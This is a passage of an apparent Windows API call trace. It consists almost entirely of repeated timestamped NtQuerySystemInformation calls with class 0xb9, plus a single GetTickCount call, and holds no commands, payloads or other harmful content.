SystemInformation=0xc751f7f600, Length=0x28, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f470, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f640, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f560, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f560, Length=0x20, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4e0, Length=0x20, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f6d0, Length=0x38, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f560, Length=0x20, ResultLength=0x0) [0208.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4f0, Length=0x20, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4f0, Length=0x20, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f7f0, Length=0x58, ResultLength=0x0) [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f730, Length=0x20, ResultLength=0x0) [0208.974] GetTickCount () returned 0x1174ebf [0208.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5e8, Length=0x58, ResultLength=0x0) [0208.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x38, ResultLength=0x0) [0208.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x28, ResultLength=0x0) [0208.977] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x28, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x28, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f330, Length=0x28, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3a0, Length=0x28, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x38, ResultLength=0x0) [0208.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x28, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f420, Length=0x28, ResultLength=0x0) [0208.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x38, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x20, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x20, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x20, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x20, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f500, Length=0x38, ResultLength=0x0) [0208.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f380, Length=0x20, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x20, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f310, Length=0x20, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5e8, Length=0x58, ResultLength=0x0) [0208.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.055] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x28, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x28, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x28, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f300, Length=0x28, ResultLength=0x0) [0209.056] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f370, Length=0x28, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.057] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x28, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x28, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.060] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f260, Length=0x20, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.061] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1e0, Length=0x20, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f430, Length=0x20, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x20, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.062] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x20, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2d0, Length=0x20, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x38, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f350, Length=0x20, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x20, ResultLength=0x0) [0209.063] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2e0, Length=0x20, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f5e8, Length=0x58, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4b0, Length=0x58, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.064] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.066] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f200, Length=0x28, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f270, Length=0x28, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.067] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.068] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0209.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.070] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f2f0, Length=0x28, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3d0, Length=0x38, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f250, Length=0x20, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f1d0, Length=0x20, ResultLength=0x0) [0209.071] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 